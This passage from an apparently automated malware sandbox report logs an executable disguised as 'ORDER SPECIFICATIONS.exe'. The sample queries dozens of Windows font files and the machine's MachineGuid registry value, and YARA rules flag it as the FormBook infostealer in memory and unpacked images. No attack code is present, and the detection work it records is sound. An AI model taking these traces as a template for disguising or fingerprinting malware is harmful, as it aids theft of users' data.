            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            Yara detected FormBook
            Source: Yara match | File source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE
